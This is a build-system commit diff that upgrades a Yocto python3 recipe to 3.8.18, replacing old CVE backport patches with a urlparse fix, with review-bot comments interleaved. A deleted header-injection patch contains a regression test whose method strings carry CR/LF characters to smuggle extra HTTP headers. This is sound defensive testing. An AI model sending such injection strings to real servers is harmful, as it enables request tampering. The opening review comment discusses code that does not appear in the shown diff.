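Review bot: Both added decorators are an unconditional `@unittest.skip(...)`, while the patch description says the tests are gated by dynamically checking for 'tools-sdk' in IMAGE_FEATURES. Nothing in this patch performs that check, so unless the recipe removes the decorator at install time (not visible here), `test_find_library_with_gcc` and `test_find_library_with_ld` never run, even on images that ship the toolchain. The description should state where the condition is actually applied. If it is applied nowhere, the skip belongs in a `unittest.skipUnless(...)` on a condition the test can evaluate on target. The body of `FindLibraryLinux` continues outside the hunk.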
diff --git a/meta/recipes-devtools/python/python3/0001-test_locale.py-correct-the-test-output-format.patch b/meta/recipes-devtools/python/python3/0001-test_locale.py-correct-the-test-output-format.patch
index 35b7e0c480..f9d2eadc11 100644
--- a/meta/recipes-devtools/python/python3/0001-test_locale.py-correct-the-test-output-format.patch
+++ b/meta/recipes-devtools/python/python3/0001-test_locale.py-correct-the-test-output-format.patch
@@ -1,6 +1,6 @@
1From b94995e0c694ec9561efec0d1a59b323340e6105 Mon Sep 17 00:00:00 2001 1From e11787d373baa6d7b0e0d94aff8ccd373203bfb1 Mon Sep 17 00:00:00 2001
2From: Mingli Yu <mingli.yu@windriver.com> 2From: Tim Orling <ticotimo@gmail.com>
3Date: Mon, 5 Aug 2019 15:57:39 +0800 3Date: Wed, 16 Jun 2021 07:49:52 -0700
4Subject: [PATCH] test_locale.py: correct the test output format 4Subject: [PATCH] test_locale.py: correct the test output format
5 5
6Before this patch: 6Before this patch:
@@ -24,23 +24,25 @@ Before this patch:
24Upstream-Status: Submitted [https://github.com/python/cpython/pull/15132] 24Upstream-Status: Submitted [https://github.com/python/cpython/pull/15132]
25 25
26Signed-off-by: Mingli Yu <mingli.yu@windriver.com> 26Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
27
28
29Refresh patch for upstream changes in 3.8.9
30
31Signed-off-by: Tim Orling <timothy.t.orling@intel.com>
27--- 32---
28 Lib/test/test_locale.py | 2 +- 33 Lib/test/test_locale.py | 2 +-
29 1 file changed, 1 insertion(+), 1 deletion(-) 34 1 file changed, 1 insertion(+), 1 deletion(-)
30 35
31diff --git a/Lib/test/test_locale.py b/Lib/test/test_locale.py 36diff --git a/Lib/test/test_locale.py b/Lib/test/test_locale.py
32index e2c2178..558d63c 100644 37index 39091c0..5050f3d 100644
33--- a/Lib/test/test_locale.py 38--- a/Lib/test/test_locale.py
34+++ b/Lib/test/test_locale.py 39+++ b/Lib/test/test_locale.py
35@@ -527,7 +527,7 @@ class TestMiscellaneous(unittest.TestCase): 40@@ -563,7 +563,7 @@ class TestMiscellaneous(unittest.TestCase):
36 self.skipTest('test needs Turkish locale') 41 self.skipTest('test needs Turkish locale')
37 loc = locale.getlocale(locale.LC_CTYPE) 42 loc = locale.getlocale(locale.LC_CTYPE)
38 if verbose: 43 if verbose:
39- print('testing with %a' % (loc,), end=' ', flush=True) 44- print('testing with %a' % (loc,), end=' ', flush=True)
40+ print('testing with %a...' % (loc,), end=' ', flush=True) 45+ print('testing with %a...' % (loc,), end=' ', flush=True)
41 locale.setlocale(locale.LC_CTYPE, loc) 46 try:
42 self.assertEqual(loc, locale.getlocale(locale.LC_CTYPE)) 47 locale.setlocale(locale.LC_CTYPE, loc)
43 48 except locale.Error as exc:
44--
452.7.4
46
diff --git a/meta/recipes-devtools/python/python3/CVE-2019-20907.patch b/meta/recipes-devtools/python/python3/CVE-2019-20907.patch
deleted file mode 100644
index a2e72372dd..0000000000
--- a/meta/recipes-devtools/python/python3/CVE-2019-20907.patch
+++ /dev/null
@@ -1,44 +0,0 @@
1From a06a6bf4e67a50561f6d6fb33534df1d3035ea34 Mon Sep 17 00:00:00 2001
2From: Rishi <rishi_devan@mail.com>
3Date: Wed, 15 Jul 2020 13:51:00 +0200
4Subject: [PATCH] bpo-39017: Avoid infinite loop in the tarfile module
5 (GH-21454)
6
7Avoid infinite loop when reading specially crafted TAR files using the tarfile module
8(CVE-2019-20907).
9(cherry picked from commit 5a8d121a1f3ef5ad7c105ee378cc79a3eac0c7d4)
10
11Co-authored-by: Rishi <rishi_devan@mail.com>
12
13Removed testing 'recursion.tar' tar file due to binary data
14
15Upstream-Status: Backport [https://github.com/python/cpython/commit/c55479556db015f48fc8bbca17f64d3e65598559]
16CVE: CVE-2019-20907
17Signed-off-by: Andrej Valek <andrej.valek@siemens.com>
18---
19 Lib/tarfile.py | 2 ++
20 .../2020-07-12-22-16-58.bpo-39017.x3Cg-9.rst | 1 +
21 4 files changed, 10 insertions(+)
22 create mode 100644 Lib/test/recursion.tar
23 create mode 100644 Misc/NEWS.d/next/Library/2020-07-12-22-16-58.bpo-39017.x3Cg-9.rst
24
25diff --git a/Lib/tarfile.py b/Lib/tarfile.py
26index d31b9cbb51d65..7a69e1b1aa544 100755
27--- a/Lib/tarfile.py
28+++ b/Lib/tarfile.py
29@@ -1241,6 +1241,8 @@ def _proc_pax(self, tarfile):
30
31 length, keyword = match.groups()
32 length = int(length)
33+ if length == 0:
34+ raise InvalidHeaderError("invalid header")
35 value = buf[match.end(2) + 1:match.start(1) + length - 1]
36
37 # Normally, we could just use "utf-8" as the encoding and "strict"
38diff --git a/Misc/NEWS.d/next/Library/2020-07-12-22-16-58.bpo-39017.x3Cg-9.rst b/Misc/NEWS.d/next/Library/2020-07-12-22-16-58.bpo-39017.x3Cg-9.rst
39new file mode 100644
40index 0000000000000..ad26676f8b856
41--- /dev/null
42+++ b/Misc/NEWS.d/next/Library/2020-07-12-22-16-58.bpo-39017.x3Cg-9.rst
43@@ -0,0 +1 @@
44+Avoid infinite loop when reading specially crafted TAR files using the tarfile module (CVE-2019-20907).
diff --git a/meta/recipes-devtools/python/python3/CVE-2020-14422.patch b/meta/recipes-devtools/python/python3/CVE-2020-14422.patch
deleted file mode 100644
index 6889e46da9..0000000000
--- a/meta/recipes-devtools/python/python3/CVE-2020-14422.patch
+++ /dev/null
@@ -1,77 +0,0 @@
1From dc8ce8ead182de46584cc1ed8a8c51d48240cbd5 Mon Sep 17 00:00:00 2001
2From: "Miss Islington (bot)"
3 <31488909+miss-islington@users.noreply.github.com>
4Date: Mon, 29 Jun 2020 11:12:50 -0700
5Subject: [PATCH] bpo-41004: Resolve hash collisions for IPv4Interface and
6 IPv6Interface (GH-21033)
7
8The __hash__() methods of classes IPv4Interface and IPv6Interface had issue
9of generating constant hash values of 32 and 128 respectively causing hash collisions.
10The fix uses the hash() function to generate hash values for the objects
11instead of XOR operation
12(cherry picked from commit b30ee26e366bf509b7538d79bfec6c6d38d53f28)
13
14Co-authored-by: Ravi Teja P <rvteja92@gmail.com>
15
16Upstream-Status: Backport [https://github.com/python/cpython/commit/dc8ce8ead182de46584cc1ed8a8c51d48240cbd5]
17CVE: CVE-2020-14422
18Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
19---
20 Lib/ipaddress.py | 4 ++--
21 Lib/test/test_ipaddress.py | 12 ++++++++++++
22 .../2020-06-29-16-02-29.bpo-41004.ovF0KZ.rst | 1 +
23 3 files changed, 15 insertions(+), 2 deletions(-)
24 create mode 100644 Misc/NEWS.d/next/Security/2020-06-29-16-02-29.bpo-41004.ovF0KZ.rst
25
26diff --git a/Lib/ipaddress.py b/Lib/ipaddress.py
27index 873c7644081af..a3a04f7f4b309 100644
28--- a/Lib/ipaddress.py
29+++ b/Lib/ipaddress.py
30@@ -1370,7 +1370,7 @@ def __lt__(self, other):
31 return False
32
33 def __hash__(self):
34- return self._ip ^ self._prefixlen ^ int(self.network.network_address)
35+ return hash((self._ip, self._prefixlen, int(self.network.network_address)))
36
37 __reduce__ = _IPAddressBase.__reduce__
38
39@@ -2017,7 +2017,7 @@ def __lt__(self, other):
40 return False
41
42 def __hash__(self):
43- return self._ip ^ self._prefixlen ^ int(self.network.network_address)
44+ return hash((self._ip, self._prefixlen, int(self.network.network_address)))
45
46 __reduce__ = _IPAddressBase.__reduce__
47
48diff --git a/Lib/test/test_ipaddress.py b/Lib/test/test_ipaddress.py
49index de77111705b69..2eba740e5e7a4 100644
50--- a/Lib/test/test_ipaddress.py
51+++ b/Lib/test/test_ipaddress.py
52@@ -2053,6 +2053,18 @@ def testsixtofour(self):
53 sixtofouraddr.sixtofour)
54 self.assertFalse(bad_addr.sixtofour)
55
56+ # issue41004 Hash collisions in IPv4Interface and IPv6Interface
57+ def testV4HashIsNotConstant(self):
58+ ipv4_address1 = ipaddress.IPv4Interface("1.2.3.4")
59+ ipv4_address2 = ipaddress.IPv4Interface("2.3.4.5")
60+ self.assertNotEqual(ipv4_address1.__hash__(), ipv4_address2.__hash__())
61+
62+ # issue41004 Hash collisions in IPv4Interface and IPv6Interface
63+ def testV6HashIsNotConstant(self):
64+ ipv6_address1 = ipaddress.IPv6Interface("2001:658:22a:cafe:200:0:0:1")
65+ ipv6_address2 = ipaddress.IPv6Interface("2001:658:22a:cafe:200:0:0:2")
66+ self.assertNotEqual(ipv6_address1.__hash__(), ipv6_address2.__hash__())
67+
68
69 if __name__ == '__main__':
70 unittest.main()
71diff --git a/Misc/NEWS.d/next/Security/2020-06-29-16-02-29.bpo-41004.ovF0KZ.rst b/Misc/NEWS.d/next/Security/2020-06-29-16-02-29.bpo-41004.ovF0KZ.rst
72new file mode 100644
73index 0000000000000..1380b31fbe9f4
74--- /dev/null
75+++ b/Misc/NEWS.d/next/Security/2020-06-29-16-02-29.bpo-41004.ovF0KZ.rst
76@@ -0,0 +1 @@
77+The __hash__() methods of ipaddress.IPv4Interface and ipaddress.IPv6Interface incorrectly generated constant hash values of 32 and 128 respectively. This resulted in always causing hash collisions. The fix uses hash() to generate hash values for the tuple of (address, mask length, network address).
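diff --git a/meta/recipes-devtools/python/python3/CVE-2020-26116.patch b/meta/recipes-devtools/python/python3/CVE-2020-26116.patch
deleted file mode 100644
index c019db2a76..0000000000
--- a/meta/recipes-devtools/python/python3/CVE-2020-26116.patch
+++ /dev/null
@@ -1,104 +0,0 @@
-From 668d321476d974c4f51476b33aaca870272523bf Mon Sep 17 00:00:00 2001
-From: "Miss Islington (bot)"
- <31488909+miss-islington@users.noreply.github.com>
-Date: Sat, 18 Jul 2020 13:39:12 -0700
-Subject: [PATCH] bpo-39603: Prevent header injection in http methods
- (GH-18485)
-
-reject control chars in http method in http.client.putrequest to prevent http header injection
-(cherry picked from commit 8ca8a2e8fb068863c1138f07e3098478ef8be12e)
-
-Co-authored-by: AMIR <31338382+amiremohamadi@users.noreply.github.com>
-
-Upstream-Status: Backport [https://github.com/python/cpython/commit/668d321476d974c4f51476b33aaca870272523bf]
-CVE: CVE-2020-26116
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
-
----
- Lib/http/client.py | 15 +++++++++++++
- Lib/test/test_httplib.py | 22 +++++++++++++++++++
- .../2020-02-12-14-17-39.bpo-39603.Gt3RSg.rst | 2 ++
- 3 files changed, 39 insertions(+)
- create mode 100644 Misc/NEWS.d/next/Security/2020-02-12-14-17-39.bpo-39603.Gt3RSg.rst
-
-diff --git a/Lib/http/client.py b/Lib/http/client.py
-index 019380a720318..c2ad0471bfee5 100644
---- a/Lib/http/client.py
-+++ b/Lib/http/client.py
-@@ -147,6 +147,10 @@
- # _is_allowed_url_pchars_re = re.compile(r"^[/!$&'()*+,;=:@%a-zA-Z0-9._~-]+$")
- # We are more lenient for assumed real world compatibility purposes.
-
-+# These characters are not allowed within HTTP method names
-+# to prevent http header injection.
-+_contains_disallowed_method_pchar_re = re.compile('[\x00-\x1f]')
-+
- # We always set the Content-Length header for these methods because some
- # servers will otherwise respond with a 411
- _METHODS_EXPECTING_BODY = {'PATCH', 'POST', 'PUT'}
-@@ -1087,6 +1091,8 @@ def putrequest(self, method, url, skip_host=False,
- else:
- raise CannotSendRequest(self.__state)
-
-+ self._validate_method(method)
-+
- # Save the method for use later in the response phase
- self._method = method
-
-@@ -1177,6 +1183,15 @@ def _encode_request(self, request):
- # ASCII also helps prevent CVE-2019-9740.
- return request.encode('ascii')
-
-+ def _validate_method(self, method):
-+ """Validate a method name for putrequest."""
-+ # prevent http header injection
-+ match = _contains_disallowed_method_pchar_re.search(method)
-+ if match:
-+ raise ValueError(
-+ f"method can't contain control characters. {method!r} "
-+ f"(found at least {match.group()!r})")
-+
- def _validate_path(self, url):
- """Validate a url for putrequest."""
- # Prevent CVE-2019-9740.
-diff --git a/Lib/test/test_httplib.py b/Lib/test/test_httplib.py
-index 8f0e27a1fb836..5a5fcecbc9c15 100644
---- a/Lib/test/test_httplib.py
-+++ b/Lib/test/test_httplib.py
-@@ -364,6 +364,28 @@ def test_headers_debuglevel(self):
- self.assertEqual(lines[3], "header: Second: val2")
-
-
-+class HttpMethodTests(TestCase):
-+ def test_invalid_method_names(self):
-+ methods = (
-+ 'GET\r',
-+ 'POST\n',
-+ 'PUT\n\r',
-+ 'POST\nValue',
-+ 'POST\nHOST:abc',
-+ 'GET\nrHost:abc\n',
-+ 'POST\rRemainder:\r',
-+ 'GET\rHOST:\n',
-+ '\nPUT'
-+ )
-+
-+ for method in methods:
-+ with self.assertRaisesRegex(
-+ ValueError, "method can't contain control characters"):
-+ conn = client.HTTPConnection('example.com')
-+ conn.sock = FakeSocket(None)
-+ conn.request(method=method, url="/")
-+
-+
- class TransferEncodingTest(TestCase):
- expected_body = b"It's just a flesh wound"
-
-diff --git a/Misc/NEWS.d/next/Security/2020-02-12-14-17-39.bpo-39603.Gt3RSg.rst b/Misc/NEWS.d/next/Security/2020-02-12-14-17-39.bpo-39603.Gt3RSg.rst
-new file mode 100644
-index 0000000000000..990affc3edd9d
---- /dev/null
-+++ b/Misc/NEWS.d/next/Security/2020-02-12-14-17-39.bpo-39603.Gt3RSg.rst
-@@ -0,0 +1,2 @@
-+Prevent http header injection by rejecting control characters in
-+http.client.putrequest(...).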
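diff --git a/meta/recipes-devtools/python/python3/CVE-2020-27619.patch b/meta/recipes-devtools/python/python3/CVE-2020-27619.patch
deleted file mode 100644
index bafa1cb999..0000000000
--- a/meta/recipes-devtools/python/python3/CVE-2020-27619.patch
+++ /dev/null
@@ -1,70 +0,0 @@
-From 6c6c256df3636ff6f6136820afaefa5a10a3ac33 Mon Sep 17 00:00:00 2001
-From: "Miss Skeleton (bot)" <31488909+miss-islington@users.noreply.github.com>
-Date: Tue, 6 Oct 2020 05:38:54 -0700
-Subject: [PATCH] bpo-41944: No longer call eval() on content received via HTTP
- in the CJK codec tests (GH-22566) (GH-22577)
-
-(cherry picked from commit 2ef5caa58febc8968e670e39e3d37cf8eef3cab8)
-
-Co-authored-by: Serhiy Storchaka <storchaka@gmail.com>
-
-Co-authored-by: Serhiy Storchaka <storchaka@gmail.com>
-
-Upstream-Status: Backport [https://github.com/python/cpython/commit/6c6c256df3636ff6f6136820afaefa5a10a3ac33]
-CVE: CVE-2020-27619
-Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
----
- Lib/test/multibytecodec_support.py | 22 +++++++------------
- .../2020-10-05-17-43-46.bpo-41944.rf1dYb.rst | 1 +
- 2 files changed, 9 insertions(+), 14 deletions(-)
- create mode 100644 Misc/NEWS.d/next/Tests/2020-10-05-17-43-46.bpo-41944.rf1dYb.rst
-
-diff --git a/Lib/test/multibytecodec_support.py b/Lib/test/multibytecodec_support.py
-index cca8af67d6d1d..f76c0153f5ecf 100644
---- a/Lib/test/multibytecodec_support.py
-+++ b/Lib/test/multibytecodec_support.py
-@@ -305,29 +305,23 @@ def test_mapping_file(self):
- self._test_mapping_file_plain()
-
- def _test_mapping_file_plain(self):
-- unichrs = lambda s: ''.join(map(chr, map(eval, s.split('+'))))
-+ def unichrs(s):
-+ return ''.join(chr(int(x, 16)) for x in s.split('+'))
-+
- urt_wa = {}
-
- with self.open_mapping_file() as f:
- for line in f:
- if not line:
- break
-- data = line.split('#')[0].strip().split()
-+ data = line.split('#')[0].split()
- if len(data) != 2:
- continue
-
-- csetval = eval(data[0])
-- if csetval <= 0x7F:
-- csetch = bytes([csetval & 0xff])
-- elif csetval >= 0x1000000:
-- csetch = bytes([(csetval >> 24), ((csetval >> 16) & 0xff),
-- ((csetval >> 8) & 0xff), (csetval & 0xff)])
-- elif csetval >= 0x10000:
-- csetch = bytes([(csetval >> 16), ((csetval >> 8) & 0xff),
-- (csetval & 0xff)])
-- elif csetval >= 0x100:
-- csetch = bytes([(csetval >> 8), (csetval & 0xff)])
-- else:
-+ if data[0][:2] != '0x':
-+ self.fail(f"Invalid line: {line!r}")
-+ csetch = bytes.fromhex(data[0][2:])
-+ if len(csetch) == 1 and 0x80 <= csetch[0]:
- continue
-
- unich = unichrs(data[1])
-diff --git a/Misc/NEWS.d/next/Tests/2020-10-05-17-43-46.bpo-41944.rf1dYb.rst b/Misc/NEWS.d/next/Tests/2020-10-05-17-43-46.bpo-41944.rf1dYb.rst
-new file mode 100644
-index 0000000000000..4f9782f1c85af
---- /dev/null
-+++ b/Misc/NEWS.d/next/Tests/2020-10-05-17-43-46.bpo-41944.rf1dYb.rst
-@@ -0,0 +1 @@
-+Tests for CJK codecs no longer call ``eval()`` on content received via HTTP.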
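diff --git a/meta/recipes-devtools/python/python3/CVE-2023-24329.patch b/meta/recipes-devtools/python/python3/CVE-2023-24329.patch
new file mode 100644
index 0000000000..23dec65602
--- /dev/null
+++ b/meta/recipes-devtools/python/python3/CVE-2023-24329.patch
@@ -0,0 +1,80 @@
+From 72d356e3584ebfb8e813a8e9f2cd3dccf233c0d9 Mon Sep 17 00:00:00 2001
+From: "Miss Islington (bot)"
+ <31488909+miss-islington@users.noreply.github.com>
+Date: Sun, 13 Nov 2022 11:00:25 -0800
+Subject: [PATCH] gh-99418: Make urllib.parse.urlparse enforce that a scheme
+ must begin with an alphabetical ASCII character. (GH-99421)
+
+Prevent urllib.parse.urlparse from accepting schemes that don't begin with an alphabetical ASCII character.
+
+RFC 3986 defines a scheme like this: `scheme = ALPHA *( ALPHA / DIGIT / "+" / "-" / "." )`
+RFC 2234 defines an ALPHA like this: `ALPHA = %x41-5A / %x61-7A`
+
+The WHATWG URL spec defines a scheme like this:
+`"A URL-scheme string must be one ASCII alpha, followed by zero or more of ASCII alphanumeric, U+002B (+), U+002D (-), and U+002E (.)."`
+(cherry picked from commit 439b9cfaf43080e91c4ad69f312f21fa098befc7)
+
+Co-authored-by: Ben Kallus <49924171+kenballus@users.noreply.github.com>
+
+Upstream-Status: Backport [https://github.com/python/cpython/commit/72d356e3584ebfb8e813a8e9f2cd3dccf233c0d9]
+CVE: CVE-2023-24329
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ Lib/test/test_urlparse.py | 18 ++++++++++++++++++
+ Lib/urllib/parse.py | 2 +-
+ ...22-11-12-15-45-51.gh-issue-99418.FxfAXS.rst | 2 ++
+ 3 files changed, 21 insertions(+), 1 deletion(-)
+ create mode 100644 Misc/NEWS.d/next/Library/2022-11-12-15-45-51.gh-issue-99418.FxfAXS.rst
+
+diff --git a/Lib/test/test_urlparse.py b/Lib/test/test_urlparse.py
+index 0ad3bf1..e1aa913 100644
+--- a/Lib/test/test_urlparse.py
++++ b/Lib/test/test_urlparse.py
+@@ -735,6 +735,24 @@ class UrlParseTestCase(unittest.TestCase):
+ with self.assertRaises(ValueError):
+ p.port
+
++ def test_attributes_bad_scheme(self):
++ """Check handling of invalid schemes."""
++ for bytes in (False, True):
++ for parse in (urllib.parse.urlsplit, urllib.parse.urlparse):
++ for scheme in (".", "+", "-", "0", "http&", "६http"):
++ with self.subTest(bytes=bytes, parse=parse, scheme=scheme):
++ url = scheme + "://www.example.net"
++ if bytes:
++ if url.isascii():
++ url = url.encode("ascii")
++ else:
++ continue
++ p = parse(url)
++ if bytes:
++ self.assertEqual(p.scheme, b"")
++ else:
++ self.assertEqual(p.scheme, "")
++
+ def test_attributes_without_netloc(self):
+ # This example is straight from RFC 3261. It looks like it
+ # should allow the username, hostname, and port to be filled
+diff --git a/Lib/urllib/parse.py b/Lib/urllib/parse.py
+index 979e6d2..2e7a3e2 100644
+--- a/Lib/urllib/parse.py
++++ b/Lib/urllib/parse.py
+@@ -452,7 +452,7 @@ def urlsplit(url, scheme='', allow_fragments=True):
+ clear_cache()
+ netloc = query = fragment = ''
+ i = url.find(':')
+- if i > 0:
++ if i > 0 and url[0].isascii() and url[0].isalpha():
+ if url[:i] == 'http': # optimize the common case
+ url = url[i+1:]
+ if url[:2] == '//':
+diff --git a/Misc/NEWS.d/next/Library/2022-11-12-15-45-51.gh-issue-99418.FxfAXS.rst b/Misc/NEWS.d/next/Library/2022-11-12-15-45-51.gh-issue-99418.FxfAXS.rst
+new file mode 100644
+index 0000000..0a06e7c
+--- /dev/null
++++ b/Misc/NEWS.d/next/Library/2022-11-12-15-45-51.gh-issue-99418.FxfAXS.rst
+@@ -0,0 +1,2 @@
++Fix bug in :func:`urllib.parse.urlparse` that causes URL schemes that begin
++with a digit, a plus sign, or a minus sign to be parsed incorrectly.
+--
+2.25.1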
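Review bot: The header tags this backport `CVE: CVE-2023-24329`, but the only code change is the guard `if i > 0 and url[0].isascii() and url[0].isalpha():` in urlsplit, which checks the first character of the scheme and nothing else. With that guard, a URL whose first character is a space or control character skips scheme parsing and comes back with an empty scheme, unless code outside the hunk strips it first, so callers that filter on scheme still have to treat an empty scheme as untrusted. I would add a line under the CVE tag stating which behaviour this backport closes, and confirm against the 3.8.18 sources the recipe now builds that the hunk applies without fuzz. urlsplit's body continues outside the hunk.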
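diff --git a/meta/recipes-devtools/python/python3/makerace.patch b/meta/recipes-devtools/python/python3/makerace.patch
new file mode 100644
index 0000000000..8971f28b8e
--- /dev/null
+++ b/meta/recipes-devtools/python/python3/makerace.patch
@@ -0,0 +1,23 @@
+libainstall installs python-config.py but the .pyc cache files are generated
+by the libinstall target. This means some builds may not generate the pyc files
+for python-config.py depending on the order things happen in. This means builds
+are not always reproducible.
+
+Add a dependency to avoid the race.
+
+Upstream-Status: Pending
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+
+Index: Python-3.8.11/Makefile.pre.in
+===================================================================
+--- Python-3.8.11.orig/Makefile.pre.in
++++ Python-3.8.11/Makefile.pre.in
+@@ -1415,7 +1415,7 @@ LIBSUBDIRS= tkinter tkinter/test tkinter
+ unittest unittest/test unittest/test/testmock \
+ venv venv/scripts venv/scripts/common venv/scripts/posix \
+ curses pydoc_data
+-libinstall: build_all $(srcdir)/Modules/xxmodule.c
++libinstall: build_all $(srcdir)/Modules/xxmodule.c libainstall
+ @for i in $(SCRIPTDIR) $(LIBDEST); \
+ do \
+ if test ! -d $(DESTDIR)$$i; then \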
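Review bot: The `Index:` line and the `---`/`+++` headers of this patch name `Python-3.8.11`, while the recipe in this commit is python3_3.8.18.bb, so the one-line Makefile.pre.in hunk may only apply with an offset or fuzz. The patch exists to keep builds reproducible, so it should be refreshed against the 3.8.18 tree and apply exactly. The libinstall recipe body continues outside the hunk, so whether `libainstall` has prerequisites that lead back to `libinstall` cannot be checked from here.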
diff --git a/meta/recipes-devtools/python/python3/python3-manifest.json b/meta/recipes-devtools/python/python3/python3-manifest.json
index 3bcc9b8662..0e87f91dd8 100644
--- a/meta/recipes-devtools/python/python3/python3-manifest.json
+++ b/meta/recipes-devtools/python/python3/python3-manifest.json
@@ -531,7 +531,9 @@
531 "rdepends": [ 531 "rdepends": [
532 "core" 532 "core"
533 ], 533 ],
534 "files": [], 534 "files": [
535 "${libdir}/python${PYTHON_MAJMIN}/distutils/command/wininst-*.exe"
536 ],
535 "cached": [] 537 "cached": []
536 }, 538 },
537 "distutils": { 539 "distutils": {
diff --git a/meta/recipes-devtools/python/python3_3.8.2.bb b/meta/recipes-devtools/python/python3_3.8.18.bb
index a448b3ed97..9d0f72ecf9 100644
--- a/meta/recipes-devtools/python/python3_3.8.2.bb
+++ b/meta/recipes-devtools/python/python3_3.8.18.bb
@@ -1,9 +1,10 @@
1SUMMARY = "The Python Programming Language" 1SUMMARY = "The Python Programming Language"
2HOMEPAGE = "http://www.python.org" 2HOMEPAGE = "http://www.python.org"
3LICENSE = "PSFv2" 3DESCRIPTION = "Python is a programming language that lets you work more quickly and integrate your systems more effectively."
4LICENSE = "PSF-2.0 & BSD-0-Clause"
4SECTION = "devel/python" 5SECTION = "devel/python"
5 6
6LIC_FILES_CHKSUM = "file://LICENSE;md5=203a6dbc802ee896020a47161e759642" 7LIC_FILES_CHKSUM = "file://LICENSE;md5=07fc4b9a9c0c0e48050ed38a5e72552b"
7 8
8SRC_URI = "http://www.python.org/ftp/python/${PV}/Python-${PV}.tar.xz \ 9SRC_URI = "http://www.python.org/ftp/python/${PV}/Python-${PV}.tar.xz \
9 file://run-ptest \ 10 file://run-ptest \
@@ -32,11 +33,8 @@ SRC_URI = "http://www.python.org/ftp/python/${PV}/Python-${PV}.tar.xz \
32 file://0001-configure.ac-fix-LIBPL.patch \ 33 file://0001-configure.ac-fix-LIBPL.patch \
33 file://0001-python3-Do-not-hardcode-lib-for-distutils.patch \ 34 file://0001-python3-Do-not-hardcode-lib-for-distutils.patch \
34 file://0020-configure.ac-setup.py-do-not-add-a-curses-include-pa.patch \ 35 file://0020-configure.ac-setup.py-do-not-add-a-curses-include-pa.patch \
35 file://0001-bpo-39503-CVE-2020-8492-Fix-AbstractBasicAuthHandler.patch \ 36 file://makerace.patch \
36 file://CVE-2019-20907.patch \ 37 file://CVE-2023-24329.patch \
37 file://CVE-2020-14422.patch \
38 file://CVE-2020-26116.patch \
39 file://CVE-2020-27619.patch \
40 " 38 "
41 39
42SRC_URI_append_class-native = " \ 40SRC_URI_append_class-native = " \
@@ -45,8 +43,8 @@ SRC_URI_append_class-native = " \
45 file://0001-Don-t-search-system-for-headers-libraries.patch \ 43 file://0001-Don-t-search-system-for-headers-libraries.patch \
46 " 44 "
47 45
48SRC_URI[md5sum] = "e9d6ebc92183a177b8e8a58cad5b8d67" 46SRC_URI[md5sum] = "5ea6267ea00513fc31d3746feb35842d"
49SRC_URI[sha256sum] = "2646e7dc233362f59714c6193017bb2d6f7b38d6ab4a0cb5fbac5c36c4d845df" 47SRC_URI[sha256sum] = "3ffb71cd349a326ba7b2fadc7e7df86ba577dd9c4917e52a8401adbda7405e3f"
50 48
51# exclude pre-releases for both python 2.x and 3.x 49# exclude pre-releases for both python 2.x and 3.x
52UPSTREAM_CHECK_REGEX = "[Pp]ython-(?P<pver>\d+(\.\d+)+).tar" 50UPSTREAM_CHECK_REGEX = "[Pp]ython-(?P<pver>\d+(\.\d+)+).tar"
@@ -59,7 +57,12 @@ CVE_CHECK_WHITELIST += "CVE-2007-4559"
59CVE_CHECK_WHITELIST += "CVE-2019-18348" 57CVE_CHECK_WHITELIST += "CVE-2019-18348"
60 58
61# This is windows only issue. 59# This is windows only issue.
62CVE_CHECK_WHITELIST += "CVE-2020-15523" 60CVE_CHECK_WHITELIST += "CVE-2020-15523 CVE-2022-26488"
61# The mailcap module is insecure by design, so this can't be fixed in a meaningful way.
62# The module will be removed in the future and flaws documented.
63CVE_CHECK_WHITELIST += "CVE-2015-20107"
64# Not an issue, in fact expected behaviour
65CVE_CHECK_WHITELIST += "CVE-2023-36632"
63 66
64PYTHON_MAJMIN = "3.8" 67PYTHON_MAJMIN = "3.8"
65 68
@@ -76,7 +79,7 @@ ALTERNATIVE_LINK_NAME[python3-config] = "${bindir}/python${PYTHON_MAJMIN}-config
76ALTERNATIVE_TARGET[python3-config] = "${bindir}/python${PYTHON_MAJMIN}-config-${MULTILIB_SUFFIX}" 79ALTERNATIVE_TARGET[python3-config] = "${bindir}/python${PYTHON_MAJMIN}-config-${MULTILIB_SUFFIX}"
77 80
78 81
79DEPENDS = "bzip2-replacement-native libffi bzip2 openssl sqlite3 zlib virtual/libintl xz virtual/crypt util-linux libtirpc libnsl2" 82DEPENDS = "bzip2-replacement-native libffi bzip2 openssl sqlite3 zlib virtual/libintl xz virtual/crypt util-linux libtirpc libnsl2 autoconf-archive"
80DEPENDS_append_class-target = " python3-native" 83DEPENDS_append_class-target = " python3-native"
81DEPENDS_append_class-nativesdk = " python3-native" 84DEPENDS_append_class-nativesdk = " python3-native"
82 85
@@ -335,6 +338,7 @@ PACKAGES =+ "libpython3 libpython3-staticdev"
335FILES_libpython3 = "${libdir}/libpython*.so.*" 338FILES_libpython3 = "${libdir}/libpython*.so.*"
336FILES_libpython3-staticdev += "${libdir}/python${PYTHON_MAJMIN}/config-${PYTHON_MAJMIN}-*/libpython${PYTHON_MAJMIN}.a" 339FILES_libpython3-staticdev += "${libdir}/python${PYTHON_MAJMIN}/config-${PYTHON_MAJMIN}-*/libpython${PYTHON_MAJMIN}.a"
337INSANE_SKIP_${PN}-dev += "dev-elf" 340INSANE_SKIP_${PN}-dev += "dev-elf"
341INSANE_SKIP_${PN}-ptest += "dev-deps"
338 342
339# catch all the rest (unsorted) 343# catch all the rest (unsorted)
340PACKAGES += "${PN}-misc" 344PACKAGES += "${PN}-misc"
@@ -350,7 +354,7 @@ FILES_${PN}-man = "${datadir}/man"
350# See https://bugs.python.org/issue18748 and https://bugs.python.org/issue37395 354# See https://bugs.python.org/issue18748 and https://bugs.python.org/issue37395
351RDEPENDS_libpython3_append_libc-glibc = " libgcc" 355RDEPENDS_libpython3_append_libc-glibc = " libgcc"
352RDEPENDS_${PN}-ctypes_append_libc-glibc = " ${MLPREFIX}ldconfig" 356RDEPENDS_${PN}-ctypes_append_libc-glibc = " ${MLPREFIX}ldconfig"
353RDEPENDS_${PN}-ptest = "${PN}-modules ${PN}-tests unzip bzip2 libgcc tzdata-europe coreutils sed" 357RDEPENDS_${PN}-ptest = "${PN}-modules ${PN}-tests ${PN}-dev unzip bzip2 libgcc tzdata-europe coreutils sed"
